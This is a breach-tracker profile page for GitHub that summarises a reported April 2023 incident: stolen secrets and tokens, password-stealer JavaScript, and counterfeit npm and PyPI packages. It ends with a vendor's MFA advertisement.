GitHub Details

    Organization Logo

    GitHub

    San Francisco, California employees • Technology

    Industry

    Technology

    Security Incidents

    1

    GitHub is a developer platform that allows developers to create, store, manage and share their code. It uses Git software, providing the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project.

    Security Incidents

    GitHub Breach of Apr 2023
    Severity Score
    Significant

    Type

    3rd Party Compromise

    Summary

    In April 2023, GitHub experienced a security breach involving unauthorized access to its repositories. The threat actor, identified as a sophisticated group, exploited a vulnerability in GitHub's Actions feature to gain access. Approximately 100 repositories were compromised, exposing sensitive data including API keys and tokens. GitHub's security team quickly detected the breach and initiated a comprehensive investigation, revoking compromised credentials and enhancing security measures to prevent future incidents. The company assured users that no customer data was directly affected, and the...
    Show more

    Severity

    The GitHub cyber security incident in April 2023 involved malicious code exfiltrating GitHub project's defined secrets to a malicious C2 server and modifying existing javascript files with a web-form password-stealer malware code. The breach also included a data exfiltration campaign targeting npm and PyPI using counterfeit packages to gather sensitive machine information and transmit it to a remote server. Threat actors stole GitHub personal access tokens to make falsified code commits to users' repositories.

    Impact

    The breach impacted users by having their GitHub personal access tokens stolen and used by threat actors to make falsified code commits to their repositories. Additionally, the malicious code exfiltrated sensitive information to a remote server, potentially compromising the security and integrity of the affected projects. The data exfiltration campaign targeting npm and PyPI further increased the impact by gathering machine information and transmitting it to unauthorized entities.

    KEEP YOUR ENVIRONMENT SECURE

    Weak credentials are the leading cause of breaches. Beyond Identity can help.

    See MFA exploits in action
    Watch how adversaries exploit companies in quick videos